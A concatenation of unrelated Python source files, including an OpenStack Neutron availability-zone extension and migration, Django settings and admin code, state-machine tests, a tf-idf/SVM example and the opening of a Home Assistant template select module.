            m_queryset.__getitem__.side_effect = STORE["events"].__getitem__
            return m_queryset
    return Query
|
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
from neutron_lib.api import validators
from neutron_lib import exceptions
from oslo_serialization import jsonutils
import six
from neutron._i18n import _
from neutron.api import extensions
from neutron.api.v2 import attributes as attr
from neutron.api.v2 import base
from neutron import manager
AZ_HINTS_DB_LEN = 255
# resource independent common methods
def convert_az_list_to_string(az_list):
    """Serialize an availability-zone list to its JSON string DB form."""
    return jsonutils.dumps(az_list)
def convert_az_string_to_list(az_string):
    """Deserialize the JSON DB form back to a list ([] for empty/None)."""
    return jsonutils.loads(az_string) if az_string else []
def _validate_availability_zone_hints(data, valid_value=None):
    """Validate the syntax of an availability_zone_hints value.

    Returns an error-message string on malformed input, None on success.
    """
    # syntax check only here. existence of az will be checked later.
    msg = validators.validate_list_of_unique_strings(data)
    if msg:
        return msg
    az_string = convert_az_list_to_string(data)
    # The serialized form must fit the DB column.
    if len(az_string) > AZ_HINTS_DB_LEN:
        # NOTE(review): raises while the check above *returns* a message —
        # inconsistent error signalling, but callers may rely on it.
        msg = _("Too many availability_zone_hints specified")
        raise exceptions.InvalidInput(error_message=msg)
# Register the syntax validator under the type alias used in the attribute map.
validators.validators['type:availability_zone_hints'] = (
    _validate_availability_zone_hints)
# Attribute Map
RESOURCE_NAME = 'availability_zone'
AVAILABILITY_ZONES = 'availability_zones'
AZ_HINTS = 'availability_zone_hints'
# name: name of availability zone (string)
# resource: type of resource: 'network' or 'router'
# state: state of availability zone: 'available' or 'unavailable'
# It means whether users can use the availability zone.
RESOURCE_ATTRIBUTE_MAP = {
    AVAILABILITY_ZONES: {
        'name': {'is_visible': True},
        'resource': {'is_visible': True},
        'state': {'is_visible': True}
    }
}
# Read-only availability_zone attribute exposed on the agents resource.
EXTENDED_ATTRIBUTES_2_0 = {
    'agents': {
        RESOURCE_NAME: {'allow_post': False, 'allow_put': False,
                        'is_visible': True}
    }
}
class AvailabilityZoneNotFound(exceptions.NotFound):
    """Raised when a requested availability zone does not exist."""
    message = _("AvailabilityZone %(availability_zone)s could not be found.")
class Availability_zone(extensions.ExtensionDescriptor):
    """Availability zone extension."""

    @classmethod
    def get_name(cls):
        return "Availability Zone"

    @classmethod
    def get_alias(cls):
        return "availability_zone"

    @classmethod
    def get_description(cls):
        return "The availability zone extension."

    @classmethod
    def get_updated(cls):
        return "2015-01-01T10:00:00-00:00"

    def get_required_extensions(self):
        return ["agent"]

    @classmethod
    def get_resources(cls):
        """Returns Ext Resources."""
        # Register singular forms for each plural resource name.
        plural_pairs = dict((name, name[:-1]) for name in RESOURCE_ATTRIBUTE_MAP)
        attr.PLURALS.update(plural_pairs)
        plugin = manager.NeutronManager.get_plugin()
        az_params = RESOURCE_ATTRIBUTE_MAP.get(AVAILABILITY_ZONES)
        az_controller = base.create_resource(
            AVAILABILITY_ZONES, RESOURCE_NAME, plugin, az_params)
        return [extensions.ResourceExtension(AVAILABILITY_ZONES, az_controller)]

    def get_extended_resources(self, version):
        """Merge the extension's attribute maps for API v2.0."""
        if version != "2.0":
            return {}
        merged = dict(EXTENDED_ATTRIBUTES_2_0)
        merged.update(RESOURCE_ATTRIBUTE_MAP)
        return merged
@six.add_metaclass(abc.ABCMeta)
class AvailabilityZonePluginBase(object):
    """REST API to operate the Availability Zone."""

    @abc.abstractmethod
    def get_availability_zones(self, context, filters=None, fields=None,
                               sorts=None, limit=None, marker=None,
                               page_reverse=False):
        """Return availability zones which a resource belongs to"""

    @abc.abstractmethod
    def validate_availability_zones(self, context, resource_type,
                                    availability_zones):
        """Verify that the availability zones exist."""
|
# This is a Django settings file for django-translatable unit testing
DATABASES = {
    'default': {
        # SQLite is sufficient for the test suite.
        'ENGINE': 'django.db.backends.sqlite3',
    },
}
INSTALLED_APPS = (
    # tested package
    'translatable',
    # test packages
    'package',
    'models',
    'admin',
)
# Activate code coverage report if required packages are available
try:
    import coverage
    import testcoverage
except ImportError:
    # Coverage tooling is optional; use the default test runner without it.
    pass
else:
    TEST_RUNNER = 'testcoverage.test_runner.TestCoverageTestRunner'
    TESTCOVERAGE_APPS = (
        'translatable',
    )
# i18n settings exercised by the translatable tests.
USE_I18N = True
LANGUAGES = (
    ('en', "English"),
    ('es', "Spanish"),
)
|
from .core import Config
def simple():
    """Parse command-line options and return (Config, input stream, options).

    The input stream is the file named by ``-c`` (opened as UTF-8 text) or
    stdin when no configuration file was given; the caller owns closing it.
    """
    from optparse import OptionParser
    parser = OptionParser(usage="\n %prog\n %prog -c config.yaml")
    parser.add_option('-c', '--config', metavar="FILENAME",
                      help="Configuration file to parse",
                      dest="configfile", default=None, type="string")
    parser.add_option('-n', '--name', metavar="NAME",
                      help="Name of configuration (default `config`), usefull if you have"
                      "several configuration in single binary",
                      dest="name", default="config", type="string")
    parser.add_option('-f', '--filename', metavar="NAME",
                      help="Filename to read",
                      dest="filename", default="config", type="string")
    parser.add_option('-p', '--print',
                      help="Print parsed configuration file",
                      dest="print", default=False, action="store_true")
    options, positional = parser.parse_args()
    if positional:
        parser.error("No arguments expected")
    cfg = Config(options.name, options.filename)
    if options.configfile:
        stream = open(options.configfile, 'rt', encoding='utf-8')
    else:
        import sys
        stream = sys.stdin
    return cfg, stream, options
|
#!/usr/bin/python
# BSD 3-Clause License
# Copyright (c) 2019, Noam C. Golombek
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import numpy as np
import tensorflow as tf
import timeit
import rospy
from tools import ResizeAndCrop
def load_hypes(model_dir):
    """Load the model hyper-parameter dictionary from JSON.

    ``model_dir`` is either a directory containing ``deeplab.json`` or a
    direct path to a JSON file.
    """
    import os
    import json
    hypes_path = (os.path.join(model_dir, "deeplab.json")
                  if os.path.isdir(model_dir) else model_dir)
    with open(hypes_path, 'r') as hypes_file:
        return json.load(hypes_file)
class DeepLabSegmenter(object):
    """Class to load deeplab model and run inference."""

    def __init__(self, model_dir, original_image_size, tensor_io, runCPU, gpu_percent=1):
        # Hyper-parameters (JSON), including the frozen-graph path.
        self.hypes = load_hypes(model_dir)
        self.input_tensor = tensor_io["input_tensor"]
        self.output_tensor = tensor_io["output_tensor"]
        frozen_graph_path = self.hypes['frozen_graph_path']
        rospy.logwarn("Deeplab to load: " + frozen_graph_path)
        # ---------------------------------------------------------------------
        """Creates and loads pretrained deeplab model."""
        self.graph = tf.Graph()
        graph_def = None
        # Extract frozen graph from given path.
        with open(frozen_graph_path, 'rb') as file_handle:
            graph_def = tf.GraphDef.FromString(file_handle.read())
        if graph_def is None:
            raise RuntimeError('Cannot find inference graph in given path.')
        with self.graph.as_default():
            tf.import_graph_def(graph_def, name='')
        # Cap per-process GPU memory for this session.
        config = tf.ConfigProto()
        config.gpu_options.per_process_gpu_memory_fraction = gpu_percent
        self.sess = tf.Session(graph=self.graph, config=config)
        # ---------------------------------------------------------------------
        # NOTE(review): `runCPU` is accepted but never used here — confirm.
        if "input_image_size" in self.hypes.keys():
            self.input_image_size = self.hypes["input_image_size"]
        else:
            self.input_image_size = (641, 361)  # fallback size (width, height?) — verify
        self.tools = ResizeAndCrop(self.hypes, original_image_size)
        # Cached uncropped-output buffer reused across frames.
        self.output_image_uncropped = None

    def run_model_on_image(self, image):
        """A function that sets up and runs an image through KittiSeg
        Input: Image to process
        Output: way_prediction, time_tf"""
        image_for_proc, self.output_image_uncropped = self.tools.preprocess_image(
            image, self.output_image_uncropped)
        # height, width, channels = image.shape
        # resize_ratio = 1.0 * self.input_image_size / max(width, height)
        # target_size = (int(resize_ratio * width), int(resize_ratio * height))
        # resized_image = image.convert('RGB').resize(
        #     target_size, Image.ANTIALIAS)
        output_image, time_tf = self.run_processed_image(image_for_proc)
        # -----------------------------------------------------------------
        # Plot confidences as red-blue overlay
        # rb_image = seg.make_overlay(image, output_image)
        return self.tools.postprocess_image(
            output_image, self.output_image_uncropped, image, self.hypes["selected_classes"]), time_tf

    def run_processed_image(self, image):
        """Runs inference on a single image.
        Args:
            image: A PIL.Image object, raw input image.
        Returns:
            resized_image: RGB image resized from original input image.
            seg_map: Segmentation map of `resized_image`.
        """
        time__tf_start = timeit.default_timer()
        # ---------------------------------
        # Batch of one: wrap the image and take the first result back out.
        batch_seg_map = self.sess.run(
            self.output_tensor,
            feed_dict={self.input_tensor: [np.asarray(image)]})
        # ---------------------------------
        time__tf = timeit.default_timer() - time__tf_start
        seg_map = batch_seg_map[0]
        return seg_map, time__tf
# def create_pascal_label_colormap():
# """Creates a label colormap used in PASCAL VOC segmentation benchmark.
# Returns:
# A Colormap for visualizing segmentation results.
# """
# colormap = np.zeros((256, 3), dtype=int)
# ind = np.arange(256, dtype=int)
# for shift in reversed(range(8)):
# for channel in range(3):
# colormap[:, channel] |= ((ind >> channel) & 1) << shift
# ind >>= 3
# return colormap
# def label_to_color_image(label):
# """Adds color defined by the dataset colormap to the label.
# Args:
# label: A 2D array with integer type, storing the segmentation label.
# Returns:
# result: A 2D array with floating type. The element of the array
# is the color indexed by the corresponding element in the input label
# to the PASCAL color map.
# Raises:
# ValueError: If label is not of rank 2 or its value is larger than color
# map maximum entry.
# """
# if label.ndim != 2:
# raise ValueError('Expect 2-D input label')
# colormap = create_pascal_label_colormap()
# if np.max(label) >= len(colormap):
# raise ValueError('label value too large.')
# return colormap[label]
|
# Copyright 2014 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Initial operations for core resources
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Create the initial core-resource tables.

    Order matters: referenced tables (networks, ports, subnets,
    ipallocationpools) must exist before the tables holding foreign keys
    to them.
    """
    # Top-level network resource.
    op.create_table(
        'networks',
        sa.Column('tenant_id', sa.String(length=255), nullable=True),
        sa.Column('id', sa.String(length=36), nullable=False),
        sa.Column('name', sa.String(length=255), nullable=True),
        sa.Column('status', sa.String(length=16), nullable=True),
        sa.Column('admin_state_up', sa.Boolean(), nullable=True),
        sa.Column('shared', sa.Boolean(), nullable=True),
        sa.PrimaryKeyConstraint('id'))
    # Ports belong to a network.
    op.create_table(
        'ports',
        sa.Column('tenant_id', sa.String(length=255), nullable=True),
        sa.Column('id', sa.String(length=36), nullable=False),
        sa.Column('name', sa.String(length=255), nullable=True),
        sa.Column('network_id', sa.String(length=36), nullable=False),
        sa.Column('mac_address', sa.String(length=32), nullable=False),
        sa.Column('admin_state_up', sa.Boolean(), nullable=False),
        sa.Column('status', sa.String(length=16), nullable=False),
        sa.Column('device_id', sa.String(length=255), nullable=False),
        sa.Column('device_owner', sa.String(length=255), nullable=False),
        sa.ForeignKeyConstraint(['network_id'], ['networks.id'], ),
        sa.PrimaryKeyConstraint('id'))
    # Subnets belong to a network; ipv6 modes are constrained enums.
    op.create_table(
        'subnets',
        sa.Column('tenant_id', sa.String(length=255), nullable=True),
        sa.Column('id', sa.String(length=36), nullable=False),
        sa.Column('name', sa.String(length=255), nullable=True),
        sa.Column('network_id', sa.String(length=36), nullable=True),
        sa.Column('ip_version', sa.Integer(), nullable=False),
        sa.Column('cidr', sa.String(length=64), nullable=False),
        sa.Column('gateway_ip', sa.String(length=64), nullable=True),
        sa.Column('enable_dhcp', sa.Boolean(), nullable=True),
        sa.Column('shared', sa.Boolean(), nullable=True),
        sa.Column('ipv6_ra_mode',
                  sa.Enum('slaac', 'dhcpv6-stateful', 'dhcpv6-stateless',
                          name='ipv6_ra_modes'),
                  nullable=True),
        sa.Column('ipv6_address_mode',
                  sa.Enum('slaac', 'dhcpv6-stateful', 'dhcpv6-stateless',
                          name='ipv6_address_modes'),
                  nullable=True),
        sa.ForeignKeyConstraint(['network_id'], ['networks.id'], ),
        sa.PrimaryKeyConstraint('id'))
    # DNS servers per subnet; rows die with their subnet (CASCADE).
    op.create_table(
        'dnsnameservers',
        sa.Column('address', sa.String(length=128), nullable=False),
        sa.Column('subnet_id', sa.String(length=36), nullable=False),
        sa.ForeignKeyConstraint(['subnet_id'], ['subnets.id'],
                                ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('address', 'subnet_id'))
    # IP allocation ranges carved out of a subnet.
    op.create_table(
        'ipallocationpools',
        sa.Column('id', sa.String(length=36), nullable=False),
        sa.Column('subnet_id', sa.String(length=36), nullable=True),
        sa.Column('first_ip', sa.String(length=64), nullable=False),
        sa.Column('last_ip', sa.String(length=64), nullable=False),
        sa.ForeignKeyConstraint(['subnet_id'], ['subnets.id'],
                                ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('id'))
    # Static host routes attached to a subnet.
    op.create_table(
        'subnetroutes',
        sa.Column('destination', sa.String(length=64), nullable=False),
        sa.Column('nexthop', sa.String(length=64), nullable=False),
        sa.Column('subnet_id', sa.String(length=36), nullable=False),
        sa.ForeignKeyConstraint(['subnet_id'], ['subnets.id'],
                                ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('destination', 'nexthop', 'subnet_id'))
    # Concrete IP assignments linking ports, subnets and networks.
    op.create_table(
        'ipallocations',
        sa.Column('port_id', sa.String(length=36), nullable=True),
        sa.Column('ip_address', sa.String(length=64), nullable=False),
        sa.Column('subnet_id', sa.String(length=36), nullable=False),
        sa.Column('network_id', sa.String(length=36), nullable=False),
        sa.ForeignKeyConstraint(['network_id'], ['networks.id'],
                                ondelete='CASCADE'),
        sa.ForeignKeyConstraint(['port_id'], ['ports.id'], ondelete='CASCADE'),
        sa.ForeignKeyConstraint(['subnet_id'], ['subnets.id'],
                                ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('ip_address', 'subnet_id', 'network_id'))
    # Free ranges still available inside each allocation pool.
    op.create_table(
        'ipavailabilityranges',
        sa.Column('allocation_pool_id', sa.String(length=36), nullable=False),
        sa.Column('first_ip', sa.String(length=64), nullable=False),
        sa.Column('last_ip', sa.String(length=64), nullable=False),
        sa.ForeignKeyConstraint(['allocation_pool_id'],
                                ['ipallocationpools.id'], ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('allocation_pool_id', 'first_ip', 'last_ip'))
    # Which DHCP agent serves which network (references the agents table,
    # which is created by another migration).
    op.create_table(
        'networkdhcpagentbindings',
        sa.Column('network_id', sa.String(length=36), nullable=False),
        sa.Column('dhcp_agent_id', sa.String(length=36), nullable=False),
        sa.ForeignKeyConstraint(['dhcp_agent_id'], ['agents.id'],
                                ondelete='CASCADE'),
        sa.ForeignKeyConstraint(['network_id'], ['networks.id'],
                                ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('network_id', 'dhcp_agent_id'))
|
from django.contrib import admin
from .models import Order, ProductPurchase #, UserCheckout
# Register your models here.
# Expose the order models in the Django admin with default ModelAdmin options.
admin.site.register(Order)
admin.site.register(ProductPurchase)
# admin.site.register(UserCheckout)
|
try:
from builtins import object
except ImportError:
pass
from collections import OrderedDict
from transitions.extensions.nesting import NestedState as State, _build_state_list
from .test_nesting import TestNestedTransitions as TestNested
try:
from unittest.mock import MagicMock
except ImportError:
from mock import MagicMock
class TestParallel(TestNested):
    """Tests for parallel (orthogonal) regions in nested state machines."""

    def setUp(self):
        super(TestParallel, self).setUp()
        # 'C' contains two parallel regions '1' and '2'; each region has
        # children a/b with initial 'a' and an internal 'go' transition a -> b.
        self.states = ['A', 'B',
                       {'name': 'C',
                        'parallel': [{'name': '1', 'children': ['a', 'b'],
                                      'initial': 'a',
                                      'transitions': [['go', 'a', 'b']]},
                                     {'name': '2', 'children': ['a', 'b'],
                                      'initial': 'a',
                                      'transitions': [['go', 'a', 'b']]}]}]
        self.transitions = [['reset', 'C', 'A']]

    def test_init(self):
        # Entering 'C' must activate the initial child of every region.
        m = self.stuff.machine_cls(states=self.states)
        m.to_C()
        self.assertEqual(['C{0}1{0}a'.format(State.separator), 'C{0}2{0}a'.format(State.separator)], m.state)

    def test_enter(self):
        # 'go' fires in both regions, moving each from 'a' to 'b'.
        m = self.stuff.machine_cls(states=self.states, transitions=self.transitions, initial='A')
        m.to_C()
        m.go()
        self.assertEqual(['C{0}1{0}b'.format(State.separator), 'C{0}2{0}b'.format(State.separator)], m.state)

    def test_exit(self):
        # Exit callbacks must fire once per region plus once for the parent
        # (3 calls per exit of 'C').
        class Model:
            def __init__(self):
                self.mock = MagicMock()

            def on_exit_C(self):
                self.mock()

            def on_exit_C_1(self):
                self.mock()

            def on_exit_C_2(self):
                self.mock()
        model1 = Model()
        m = self.stuff.machine_cls(model1, states=self.states, transitions=self.transitions, initial='A')
        m.add_transition('reinit', 'C', 'C')
        model1.to_C()
        self.assertEqual(['C{0}1{0}a'.format(State.separator), 'C{0}2{0}a'.format(State.separator)], model1.state)
        model1.reset()
        self.assertTrue(model1.is_A())
        self.assertEqual(3, model1.mock.call_count)
        model2 = Model()
        m.add_model(model2, initial='C')
        # A self-transition C -> C also exits (and re-enters) all regions.
        model2.reinit()
        self.assertEqual(['C{0}1{0}a'.format(State.separator), 'C{0}2{0}a'.format(State.separator)], model2.state)
        self.assertEqual(3, model2.mock.call_count)
        model2.reset()
        self.assertTrue(model2.is_A())
        self.assertEqual(6, model2.mock.call_count)
        for mod in m.models:
            mod.trigger('to_C')
        for mod in m.models:
            mod.trigger('reset')
        self.assertEqual(6, model1.mock.call_count)
        self.assertEqual(9, model2.mock.call_count)

    def test_parent_transition(self):
        # A transition scoped to one region's substate must leave the
        # sibling region untouched.
        m = self.stuff.machine_cls(states=self.states)
        m.add_transition('switch', 'C{0}2{0}a'.format(State.separator), 'C{0}2{0}b'.format(State.separator))
        m.to_C()
        m.switch()
        self.assertEqual(['C{0}1{0}a'.format(State.separator), 'C{0}2{0}b'.format(State.separator)], m.state)

    def test_shallow_parallel(self):
        sep = self.state_cls.separator
        states = [
            {
                'name': 'P', 'parallel':
                [
                    '1',  # no initial state
                    {'name': '2', 'children': ['a', 'b'], 'initial': 'b'}
                ]
            },
            'X'
        ]
        m = self.machine_cls(states=states, initial='P')
        self.assertEqual(['P{0}1'.format(sep), 'P{0}2{0}b'.format(sep)], m.state)
        m.to_X()
        self.assertEqual('X', m.state)
        # Re-entering 'P' restores the full parallel configuration.
        m.to_P()
        self.assertEqual(['P{0}1'.format(sep), 'P{0}2{0}b'.format(sep)], m.state)

    def test_multiple(self):
        # Parallel regions nested directly inside a parallel region.
        states = ['A',
                  {'name': 'B',
                   'parallel': [
                       {'name': '1', 'parallel': [
                           {'name': 'a', 'children': ['x', 'y', 'z'], 'initial': 'z'},
                           {'name': 'b', 'children': ['x', 'y', 'z'], 'initial': 'y'}
                       ]},
                       {'name': '2', 'children': ['a', 'b', 'c'], 'initial': 'a'},
                   ]}]
        m = self.stuff.machine_cls(states=states, initial='A')
        self.assertTrue(m.is_A())
        m.to_B()
        self.assertEqual([['B{0}1{0}a{0}z'.format(State.separator),
                           'B{0}1{0}b{0}y'.format(State.separator)],
                          'B{0}2{0}a'.format(State.separator)], m.state)
        m.to_A()
        self.assertEqual('A', m.state)

    def test_multiple_deeper(self):
        sep = self.state_cls.separator
        states = ['A',
                  {'name': 'P',
                   'parallel': [
                       '1',
                       {'name': '2', 'parallel': [
                           {'name': 'a'},
                           {'name': 'b', 'parallel': [
                               {'name': 'x', 'parallel': ['1', '2']}, 'y'
                           ]}
                       ]},
                   ]}]
        # Expected nested state value mirrors the region nesting exactly.
        ref_state = ['P{0}1'.format(sep),
                     ['P{0}2{0}a'.format(sep),
                      [['P{0}2{0}b{0}x{0}1'.format(sep),
                        'P{0}2{0}b{0}x{0}2'.format(sep)],
                       'P{0}2{0}b{0}y'.format(sep)]]]
        m = self.stuff.machine_cls(states=states, initial='A')
        self.assertTrue(m.is_A())
        m.to_P()
        self.assertEqual(ref_state, m.state)
        m.to_A()

    def test_model_state_conversion(self):
        # Round-trip: nested state list -> OrderedDict tree -> state list.
        sep = self.state_cls.separator
        states = ['P{0}1'.format(sep),
                  ['P{0}2{0}a'.format(sep),
                   [['P{0}2{0}b{0}x{0}1'.format(sep),
                     'P{0}2{0}b{0}x{0}2'.format(sep)],
                    'P{0}2{0}b{0}y'.format(sep)]]]
        tree = OrderedDict(
            [('P', OrderedDict(
                [('1', OrderedDict()),
                 ('2', OrderedDict(
                     [('a', OrderedDict()),
                      ('b', OrderedDict(
                          [('x', OrderedDict(
                              [('1', OrderedDict()),
                               ('2', OrderedDict())])),
                           ('y', OrderedDict())]
                      ))]
                 ))]
            ))]
        )
        m = self.machine_cls()
        self.assertEqual(tree, m._build_state_tree(states, sep))
        self.assertEqual(states, _build_state_list(tree, sep))
|
# -*- coding: utf-8 -*-
"""
Created on Thu Jan 19 13:23:12 2017
@author: rmatam
"""
# -*- coding: utf-8 -*-
# 2015/01/11
# Script passed in py2 & py3 with Ubuntu 14.04 env.
# Prerequirement: pip install numpy scipy scikit-learn
# furthermore info http://scikit-learn.org/stable/modules/generated/sklearn.feature_extraction.text.TfidfVectorizer.html.
# furthermore info http://scikit-learn.org/stable/modules/classes.html#module-sklearn.svm
# There have a lot of descriptions of setting variables on the website, please check it if you need the further setting.
from sklearn import svm
from sklearn.feature_extraction.text import TfidfVectorizer as tfidf

# Tf-idf vectorizer shared by the training and test corpora.
vec = tfidf(smooth_idf=False)
svc = svm.SVC(kernel='poly')  # further settings on website: http://scikit-learn.org/stable/modules/generated/sklearn.svm.SVC.html
# training set, "List" type.
trainset = ["good good good good good great great great",  # corpus 1
            "bad bad bad bad bad bad dirty dirty dirty",   # corpus 2
            ]
trainTag = ["pos", "neg"]  # corpus's tags.
# test set, "List" type.
testset = ["good good good good good great great great",
           "good good good good good great great great bad",
           "good good good good good great great great bad bad",
           "good good good good good great great great bad bad bad",
           "good good good good good great great great dirty",
           "good good good good good great great great dirty dirty",
           "good good good good good great great great dirty dirty dirty",
           "bad bad bad bad bad bad dirty dirty dirty",
           "bad bad bad bad bad bad dirty dirty dirty good",
           "bad bad bad bad bad bad dirty dirty dirty good good",
           "bad bad bad bad bad bad dirty dirty dirty good good good",
           "bad bad bad bad bad bad dirty dirty dirty great",
           "bad bad bad bad bad bad dirty dirty dirty great great",
           "bad bad bad bad bad bad dirty dirty dirty great great great",
           ]
testTag = ["pos", "pos", "pos", "pos", "pos", "pos", "pos",
           "neg", "neg", "neg", "neg", "neg", "neg", "neg",
           ]
# Fit the vectorizer on the TRAINING corpus only and transform it.
trainRs = vec.fit_transform(trainset).toarray()
# BUG FIX: the test set must be transformed with the vectorizer fitted on the
# training data (vec.transform), not re-fitted (vec.fit_transform): refitting
# recomputes the vocabulary and idf from the test corpus, leaking test-set
# statistics and potentially producing an incompatible feature space. Note
# that the sample console output quoted at the bottom of this file was
# produced by the old, refitting version, so its tf-idf numbers may differ.
testRs = vec.transform(testset).toarray()
# the tfidf array result of training & test set.
print("Training set tfidf result.")
print(trainRs.shape)
print(trainRs)
print("----------------------------------------")
print("Test set tfidf result.")
print(testRs.shape)
print(testRs)
# training...
svc.fit(trainRs, trainTag)  # further settings on website: http://scikit-learn.org/stable/modules/generated/sklearn.svm.SVC.html
# accuracy of the model.
print("----------------------------------------")
accuracy = svc.score(testRs, testTag)
print("SVM model accuracy:")
print(accuracy)
# predicting test set result.
print("----------------------------------------")
predict = svc.predict(testRs)
print("SVM model predict result:")
print(predict)
'''
Console Print:::
Training set tfidf result.
(2, 4)
[[ 0. 0. 0.85749293 0.51449576]
[ 0.89442719 0.4472136 0. 0. ]]
----------------------------------------
Test set tfidf result.
(14, 4)
[[ 0. 0. 0.85749293 0.51449576]
[ 0.16903085 0. 0.84515425 0.50709255]
[ 0.32444284 0. 0.81110711 0.48666426]
[ 0.45749571 0. 0.76249285 0.45749571]
[ 0. 0.16903085 0.84515425 0.50709255]
[ 0. 0.32444284 0.81110711 0.48666426]
[ 0. 0.45749571 0.76249285 0.45749571]
[ 0.89442719 0.4472136 0. 0. ]
[ 0.88465174 0.44232587 0.14744196 0. ]
[ 0.85714286 0.42857143 0.28571429 0. ]
[ 0.81649658 0.40824829 0.40824829 0. ]
[ 0.88465174 0.44232587 0. 0.14744196]
[ 0.85714286 0.42857143 0. 0.28571429]
[ 0.81649658 0.40824829 0. 0.40824829]]
----------------------------------------
SVM model accuracy:
1.0
----------------------------------------
SVM model predict result:
['pos' 'pos' 'pos' 'pos' 'pos' 'pos' 'pos' 'neg' 'neg' 'neg' 'neg' 'neg'
'neg' 'neg']
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2008 John Paulett (john -at- paulett.org)
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
import sys
import timeit
# NOTE(review): Python 2 source (`print` statements) — do not run under Python 3.
IS_25_DOWN = sys.version_info[:2] <= (2, 5)
number = 1000
mod = 'json'
if IS_25_DOWN:
    # Python <= 2.5 has no stdlib json module; use the simplejson backend.
    mod = 'simplejson'
# Statement benchmarked by timeit: parse an RSS document and round-trip it
# through jsonstruct encode/decode with the selected backend.
json = """\
import feedparser
import jsonstruct
import jsonstruct.tests.thirdparty_tests as test
doc = feedparser.parse(test.RSS_DOC)
jsonstruct.set_preferred_backend('%s')
pickled = jsonstruct.encode(doc)
unpickled = jsonstruct.decode(pickled)
if doc['feed']['title'] != unpickled['feed']['title']:
    print 'Not a match'
""" % mod
print 'Using %s' % mod
json_test = timeit.Timer(stmt=json)
print "%.9f sec/pass " % (json_test.timeit(number=number) / number)
|
"""Support for selects which integrates with other components."""
from __future__ import annotations
import contextlib
import logging
from typing import Any
import voluptuous as vol
from homeassistant.components.select import SelectEntity
from homeassistant.components.select.const import (
ATTR_OPTION,
ATTR_OPTIONS,
DOMAIN as SELECT_DOMAIN,
)
from homeassistant.const import (
CONF_ICON,
CONF_NAME,
CONF_OPTIMISTIC,
CONF_STATE,
CONF_UNIQUE_ID,
)
from homeassistant.core import Config, HomeAssistant
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.script import Script
from homeassistant.helpers.template import Template, TemplateError
from . import TriggerUpdateCoordinator
from .const import CONF_AVAILABILITY
from .template_entity import TemplateEntity
from .trigger_entity import TriggerEntity
_LOGGER = logging.getLogger(__name__)

CONF_SELECT_OPTION = "select_option"

DEFAULT_NAME = "Template Select"
DEFAULT_OPTIMISTIC = False

# YAML schema for one template select definition.
SELECT_SCHEMA = vol.Schema(
    {
        vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.template,
        vol.Required(CONF_STATE): cv.template,
        vol.Required(CONF_SELECT_OPTION): cv.SCRIPT_SCHEMA,
        vol.Required(ATTR_OPTIONS): cv.template,
        vol.Optional(CONF_AVAILABILITY): cv.template,
        vol.Optional(CONF_OPTIMISTIC, default=DEFAULT_OPTIMISTIC): cv.boolean,
        vol.Optional(CONF_UNIQUE_ID): cv.string,
        vol.Optional(CONF_ICON): cv.template,
    }
)
async def _async_create_entities(
    hass: HomeAssistant, definitions: list[dict[str, Any]], unique_id_prefix: str | None
) -> list[TemplateSelect]:
    """Instantiate a TemplateSelect for every definition in the config."""
    selects: list[TemplateSelect] = []
    for conf in definitions:
        unique_id = conf.get(CONF_UNIQUE_ID)
        # Namespace the unique_id under the config-entry prefix when both exist.
        if unique_id_prefix and unique_id:
            unique_id = f"{unique_id_prefix}-{unique_id}"
        selects.append(
            TemplateSelect(
                hass,
                conf.get(CONF_NAME, DEFAULT_NAME),
                conf[CONF_STATE],
                conf.get(CONF_AVAILABILITY),
                conf[CONF_SELECT_OPTION],
                conf[ATTR_OPTIONS],
                conf.get(CONF_OPTIMISTIC, DEFAULT_OPTIMISTIC),
                unique_id,
                conf.get(CONF_ICON),
            )
        )
    return selects
async def async_setup_platform(
    hass: HomeAssistant,
    config: Config,
    async_add_entities: AddEntitiesCallback,
